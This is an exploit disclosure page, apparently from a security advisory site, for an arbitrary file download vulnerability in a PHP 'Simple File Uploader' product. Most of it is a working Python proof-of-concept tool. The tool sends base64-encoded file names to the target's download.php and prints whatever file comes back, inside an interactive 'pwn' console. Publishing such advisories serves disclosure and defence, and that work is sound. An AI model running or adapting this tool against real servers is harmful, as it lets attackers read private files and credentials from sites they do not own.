Simple File Uploader Arbitrary File Download

2017.04.28
Credit: Daniel Godoy
Risk: High
Local: No
Remote: Yes
CVE: N/A

# Exploit Title: Simple File Uploader - Arbitrary File Download # Date: 27/04/2017 # Exploit Author: Daniel Godoy # Vendor Homepage: https://codecanyon.net/ # Software Link: https://codecanyon.net/item/simple-file-uploader-explorer-and-manager-php-based-secured-file-manager/18393053 # Tested on: GNU/Linux # GREETZ: Rodrigo MouriA+-o, Rodrigo Avila, #RemoteExecution Team POC #!/usr/bin/env python #https://pastebin.com/HeT7RuRU import os,re,requests,time,base64 os.system('clear') BLUE = '\033[94m' RED = '\033[91m' GREEN = '\033[32m' CYAN = "\033[96m" WHITE = "\033[97m" YELLOW = "\033[93m" MAGENTA = "\033[95m" GREY = "\033[90m" DEFAULT = "\033[0m" def banner(): print WHITE+"" print " ## ## " print " ## ## " print " ############## " print " #### ###### #### " print " ###################### " print " ## ############## ## " print " ## ## ## ## " print " #### ####" print "" def details(): print WHITE+" =[" + YELLOW + "Simple File Uploader Download Tool v1.0.0 " print "" def core_commands(): os.system('clear') print WHITE+'''Core Commands\n===============\n Command\t\t\tDescription\n-------\t\t\t-----------\n ?\t\t\tHelp menu quit\t\t\tExit the console info\t\t\tDisplay information download\t\t\tExploit Vulnerability ''' def about(): os.system('clear') print WHITE+'''Simple File Uploader Download Tool v1.0.0 \n===============\n Author\t\t\tDescription\n-------\t\t\t-----------\n Daniel Godoy\t\thttps://www.exploit-db.com/author/?a=3146 ''' def download(): other = 'a' while other != 'n': urltarget = str(raw_input(WHITE+'Target: ')) filename = str(raw_input(WHITE+'FileName: ')) filename = base64.b64encode(filename) print RED+"[x]Sending Attack: "+WHITE+urltarget+'download.php?id='+filename final = urltarget+'download.php?id='+filename r = requests.get(final) print r.text other = str(raw_input(WHITE+'Test other file? y/n: ')) if other == "n": print "Type quit to exit. Bye!" banner() details() option='0' while option != 0: option = (raw_input(RED+"pwn" + WHITE +" > ")) if option == "quit": os.system('clear') option = 0 elif option == "?": core_commands() elif option == "help": core_commands() elif option == "about": about() elif option == "download": download() elif option == "info": about() else: print "Not a valid option! Need help? Press ? to display core commands " +GREEN


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2018, cxsecurity.com

 

Back to Top